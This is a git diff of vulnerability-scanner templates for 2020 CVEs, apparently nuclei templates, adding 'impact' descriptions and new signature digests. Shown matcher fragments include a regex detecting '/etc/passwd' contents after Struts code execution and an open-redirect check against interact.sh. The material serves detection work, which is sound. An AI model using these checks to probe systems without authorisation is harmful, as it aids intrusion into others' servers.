+# digest: 490a004630440220215e1b1acfc7a41df759980fc0717a49efb1e12919dc9091db20bcfb19dd42a7022054fcef0abf00d01048518ced7c246228be1992842eb90a302f307d470c56815f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml
index bd887e1128..378f14c48b 100644
--- a/http/cves/2020/CVE-2020-15148.yaml
+++ b/http/cves/2020/CVE-2020-15148.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
   reference:
     - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a0047304502201c39c5f4ec4f4979873ae12d025b39d5d29c31619c2628fbbcc675e33463d0ea022100b5e711b42e0386f58e59c6b13c07cc903fcae75a3c30cc3e06e2bbe56f7b0420:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220695c23c438348b0b7a81821269407176bd60a62400c692de7095b81b3de5f19c022027da5f60e230151468f731203caccd8090dbfe2df6826ba41e5b1f80bfd84dba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml
index 27c45e6701..bb69ab6732 100644
--- a/http/cves/2020/CVE-2020-15227.yaml
+++ b/http/cves/2020/CVE-2020-15227.yaml
@@ -5,6 +5,8 @@ info:
   author: becivells
   severity: critical
   description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d4554c371c4d229797a718b32fda389afed915299cc608d9d22b5f0b90a0fedd022100ba0895c5cf1c97f3b96e5b11cb2e090b413b872a73c2f57aa38c24362f9905d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100943599310560fca86d5c776b4c03c9cb505b531c5f8329f0d96b959fd0428643022100e08ab979a24884344b079d3129f0ef5ffd3ec3c8655014a52d2a89a23e7b711f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml
index d8a6062250..500b13ebc4 100644
--- a/http/cves/2020/CVE-2020-15500.yaml
+++ b/http/cves/2020/CVE-2020-15500.yaml
@@ -5,6 +5,8 @@ info:
   author: Akash.C
   severity: medium
   description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js  because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210098e273328a98ab460af2e766f855bb19a87ab81151996b98afa11c022ae80cab0221008caea3ea723900331b34723182eb37986b7650cb20da4d0e5999bbf298b372ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100980f2ff6947b344668a1d3e3e780b485de668f0613e0864fb8a451aca1d85e09022100d61dc749131ff157399676f0d165ecb46f7e4781e43c01f1aee69ba7ded99617:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml
index 3ee263dbdc..1abcf20231 100644
--- a/http/cves/2020/CVE-2020-15505.yaml
+++ b/http/cves/2020/CVE-2020-15505.yaml
@@ -9,6 +9,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure.
   remediation: |
     Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008dc6af264afea2a4bc53d2612e50ee8130f9af2c948259f44e0a234b5d275f22022067744bf0fd26a0020554ea0673d35a64f649a5da08f1b6105763d498c1637551:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022051df052a9cfee24aeb5f6e8743b0c9f52562045a19bff8d07cd15e2c1aa57897022100f20052482245997754e79a8ba0c7ae0cc5123a099789697cf6ae4b04cf1932c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml
index de0205b797..a48859f9d5 100644
--- a/http/cves/2020/CVE-2020-15568.yaml
+++ b/http/cves/2020/CVE-2020-15568.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d1189cc7ba0a8428e536a55994f2a1c54025b477331fd11bc177b2a740854338022100a8199d7de33d972fb93ccb3074cc618ca32c785e661534ef5ffd55b67601f4ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204e69e8c61bb15bdc294ce3b5977b69efc66cb6804c0d266d4fddb61ffed3c4d5022100ee9a1ee6be94c6de1853a6e910ea5d0a3d5c6ab0678d62e411266d6b4752a2e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml
index 7eda4b6803..48f94491e5 100644
--- a/http/cves/2020/CVE-2020-15867.yaml
+++ b/http/cves/2020/CVE-2020-15867.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).
   reference:
@@ -96,4 +98,4 @@ http:
         regex:
           - name="last_commit" value="(.*)"
         internal: true
-# digest: 4a0a00473045022100c23210cbc03b3b21876bd86def960eead7ff846d141c82c6688ccbb8c5bf024e02205668cc5f9a31f8538b4702b0155c6a2ca9ac749542c650ca76071f7bb6138a74:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b2e60718a860cbab8d422b70592ce5300e0d318532dbced62b4888b4abc10633022058419d2521ac39f5a32e74734d90d0a6336e4d648e46698e0fba2301e8ecd1cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml
index 7848500aa5..932e7922b9 100644
--- a/http/cves/2020/CVE-2020-15895.yaml
+++ b/http/cves/2020/CVE-2020-15895.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202f6625d38e6deff48cb10a32c5c58ad27dada6ad646e80af932cd5d83418a68a022054e53094eeb7492d90d8259f96a572f23285ec745f6e1d220fd2946c967e6cdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022062ace83a6fd893059481e01c458fdde22dfbff1dd1273504a34973830b6fe30302205c23d7e92033f908774350ee7bdf19735e855089a1f1eee9ec09e8b342ac6237:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml
index cedeefe16f..7466a9f84a 100644
--- a/http/cves/2020/CVE-2020-15920.yaml
+++ b/http/cves/2020/CVE-2020-15920.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022029ef261c0cd420547ebbc2c3e791f31569fefe0711e603891baa209221ee1dc502205ac13ad12214cacfd63ded2c2febf28db81fc8647f6fb55b2630dfd1e855add0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f43912b3d39cc8fd0e7bb7a822fbb01fdf07a9b0f35d2ff0727854f8af96e3890221008a522993ccf9ed31f0ed5c48bdf35b7c99d1b39329fd05e101bcdd73fbf581eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml
index bab84a2bb7..c51d794e5f 100644
--- a/http/cves/2020/CVE-2020-16139.yaml
+++ b/http/cves/2020/CVE-2020-16139.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
+  impact: |
+    An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users.
   remediation: |
     Apply the latest firmware update provided by Cisco to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ea1e9de2fd2966dff652903c8a0d8a970d2f10e1436921e4709a036229a50e3f022100ffc47933bf500eff8528fb36603cb76553000d99c3c05b37557ad33952140ab3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022058853f42ab9a3cc2695733f8bf4f7daf6f31862a1dbd5b82596457e71c827c6f0221009355ef1d40c0aa1e9c0acd184ec60f27e8c94657beea806653686b1dd0fe7827:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml
index 98d4c538e8..fcbf43f445 100644
--- a/http/cves/2020/CVE-2020-16952.yaml
+++ b/http/cves/2020/CVE-2020-16952.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to a complete compromise of the SharePoint server.
   remediation: |
     Apply the latest security updates provided by Microsoft to address this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 200
           - 201
         condition: or
-# digest: 4a0a00473045022012ae33ba8471f234f67e95a5457607f132d5710a557b01c93d7e77dc9fef140b022100fc43b0072f587f70c79efa11b079a31db1cd35983f1a2136d32022780ccea9ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e02e8e3359ce0774a570e8ca073cc8e9beef3acf84ce51fe6d5bb65b5bfa1c2e022100ab3ff152215e8a239e91b0403786aa67a6204a0876c499e856ebc0c93204431a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml
index ffff2d4c79..db411da39c 100644
--- a/http/cves/2020/CVE-2020-17362.yaml
+++ b/http/cves/2020/CVE-2020-17362.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201ff5bd9c9d42e03c39befb7c16c08c4c0cda009af4136ea205cd9b8042176066022100adfd298f22b386175e058d9d68bfc16fe142b00c30aa175bfbcad391d318a501:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009dcf33287529b48702dc4cf2d72d142c61de06296b1754031c2f898517a10e7b02206c8a759604a24b4d6ddc824cd50464d7baff2c7134b978159e4443e754d80d41:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml
index e30ea7df63..da384e2211 100644
--- a/http/cves/2020/CVE-2020-17453.yaml
+++ b/http/cves/2020/CVE-2020-17453.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ce930b4a966a9f9b566aad79208df7dbfb958f1daaf377fadf3109a853e9b85a022016fa76e63eda11b78ef38c409a11eff069822715f3bf64b6cc5718b30293e291:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c7501f1bb71ea2c9c709b68032f3f8da5c22366008530eb47167c562e5ab80f20221008c964f0ec2e7d62a362803936cc57ef0566ec9ba5c63e2c4a935b0b34c3859e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml
index 7a35641051..0243dfa10d 100644
--- a/http/cves/2020/CVE-2020-17456.yaml
+++ b/http/cves/2020/CVE-2020-17456.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741,edoardottt
   severity: critical
   description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c3cf23fe9e3b89cedc7e63f8500c90af7ad138bb8dbcd387a28e4c86c142166802207d7758df648cdadfa9daa65b6a9fd0dc10a0db6644e3cc4bfb338fb14a7f89f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220495826a0e1bcb6e60f142a7012901617e17c0d787ee4ae39b65cec7c9f91461502204dc005b29a06d5c6ad438853dde20d18c89d6379a5e21dc44e284176ca5136c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml
index 0a06fca621..d1d234724b 100644
--- a/http/cves/2020/CVE-2020-17463.yaml
+++ b/http/cves/2020/CVE-2020-17463.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: Fixed in version 115
   reference:
     - https://www.exploit-db.com/exploits/48741
@@ -61,4 +63,4 @@ http:
           - 'status_code_3 == 200'
           - 'contains(body_1, "FUEL CMS")'
         condition: and
-# digest: 4a0a00473045022100a193e5947c911d339f14308335b17d3cd24341c2d31ab2153df77eea266b738f02204ae0a59afe77195e2c41354042e6c56fbe74990e053b77d3dfd601aa5ba44bf7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009af2af6464e551ab60c2fe8679d2ad95b7242217e445390c54bad7013afad3a702210095cd69e3070c16151b2017f5dc95c002fc386ed36d48a0b9e8c47de594915e4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml
index a847e2af5a..23dd977a5b 100644
--- a/http/cves/2020/CVE-2020-17496.yaml
+++ b/http/cves/2020/CVE-2020-17496.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: critical
   description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade vBulletin to a version that is not affected by CVE-2020-17496.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205e85eaa816ec53e61a7c469e723c5052c4af13e4f6aa51bea1cc9bdb3842befd02210084128070ec243c8a7befffc7b63270ea012ba0201368855521327e30f8737f9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210097ca825a6f81d98dfb3a587f3091e8c4880b8fadb13c4c48ee5533ae623d7ba90221008921759ce72da8f0967ad16c3e8bd9645724ec8ab95ac0f7d6ee25385d53f64b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml
index 85bccd09be..a1b6abd216 100644
--- a/http/cves/2020/CVE-2020-17505.yaml
+++ b/http/cves/2020/CVE-2020-17505.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c42d9feef3c1286861e985e5c65c651f049bcb1769e64bc0258b159611ce7a760220350134201505aad50d37339f5913237ccedaf40f55b7c83bd9470827e9101a37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100834a4d1f52902da66b5c31bad1399628399109c1eea0d3e8106f2570aad33a4102207b9379be59a4d9f63ab7e5cc731944cac3a51bae6b0732c0a41733117c8f6872:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml
index b711ce6013..959b7f1130 100644
--- a/http/cves/2020/CVE-2020-17506.yaml
+++ b/http/cves/2020/CVE-2020-17506.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: kval
         kval:
           - "PHPSESSID"
-# digest: 4a0a00473045022100c8be1dc653978dd31ced1cac445967ba4d2e18437084af796daa85b0d02833d50220283111b9056f4c36d845c485990965c91da9660a56e4e653ff1aafa976a8ddb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200587ccbfd074a56100087fa76fe0f359d07b13eeed08ad1b81a7ea4f385983ea02204300975dc7ee9678af1b22eae87422d0bd6dcaf8da652f23bdaaf691eb617c1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml
index 6c617e1def..02f6b05917 100644
--- a/http/cves/2020/CVE-2020-17518.yaml
+++ b/http/cves/2020/CVE-2020-17518.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later).
   reference:
@@ -48,4 +50,4 @@ http:
       - type: dsl
         dsl:
           - 'contains(body_2, "{{randstr}}") && status_code == 200'
-# digest: 4a0a00473045022100a94a95d627b3f4892d274f55f82bbe11efaa618400f857f37a63b53f15bb90ba022038e04a529f97ff41b9682495f3f697768de80f69922a230d8400e831f85cca7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205438d27611eff11a4289331adc34f255483f3547f6f1764c9511c016d6ac8b8b022100b087740f6d446b6bdbdffb1677d0c0b95d7ba813e636e90532c14131a6de0e04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml
index 72b98b65bd..10893ef7fd 100644
--- a/http/cves/2020/CVE-2020-17526.yaml
+++ b/http/cves/2020/CVE-2020-17526.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code.
   remediation: Change default value for [webserver] secret_key config.
   reference:
     - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
@@ -56,4 +58,4 @@ http:
           - "SLA Misses"
           - "Task Instances"
         condition: and
-# digest: 4a0a0047304502200bf5be42853310c4f6a772dae97090ed7dfd4eaf3f9b926d8d6631f35fc4c211022100eb83e6374c292828261d6a3c75eb63ee1be3d89d382046d3dd1659c11ee6230d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220431bf42e38810e48eaaabb93f4b7c76df70e25c4ef298136b2ac0186708d93f802206558f8a37577919fbdc8f7ad24eb32141c8b7d3b4df34a0fb17d7b74a32b38f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml
index 95f45e6ebc..5a1c0c6d32 100644
--- a/http/cves/2020/CVE-2020-17530.yaml
+++ b/http/cves/2020/CVE-2020-17530.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts.
   reference:
@@ -38,4 +40,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 490a00463044022060ab9bbedca39b00a05c635439bc9966f5ba01feb116a7f231c08ddfbb7845eb022054214283207e82f1a0bbb1278ba114970d71e833bad74b2053590a1a00edb2f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207cd5baf78cb377f20bf80ae199082a8a644a692121f11d5d9baa98222e54f1b9022100fe79370b3aa452148e231bea1f3f3b594dd88d3e96e364920db269256d882b7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml
index c12aaf4b31..9dbd4d1836 100644
--- a/http/cves/2020/CVE-2020-18268.yaml
+++ b/http/cves/2020/CVE-2020-18268.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
   remediation: |
     Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502201fc558295297e43d4de8a7ac0f2ce1dbb030565b16fcd26b1ee4bad73c59f878022100cae13060de09a030bda131dd1c3b9feadf238517f0554353d7efa2233018641b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022077f340d42bc9c58966da72ee616d497005a3a5e3c1bc7eef5c7390f517a5ae4002200a2ee38ac19c79206f7771053efb4c5553d8a9ca1b6f8176487cf8be5faa265f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml
index c65ea9ab7d..93c766d29b 100644
--- a/http/cves/2020/CVE-2020-19282.yaml
+++ b/http/cves/2020/CVE-2020-19282.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c53ab3ae7b57348e47c5430b3fab71d7406aa9da9dda5d2b42eada8a081f413b022005dc8499dfcd7278aa178b3baca571924529e8ab4b146e21b1e3a968e3f2a51d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210090915d9821b6cfb314e108c1a01bf45adb112135fd8047ebbb7094a4164fe433022100cdbe2b126d1eaee916d4bd37683f74971b68774ea526f70cf5ff1549783f7d4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml
index 7963d95fc8..387f181d60 100644
--- a/http/cves/2020/CVE-2020-19283.yaml
+++ b/http/cves/2020/CVE-2020-19283.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
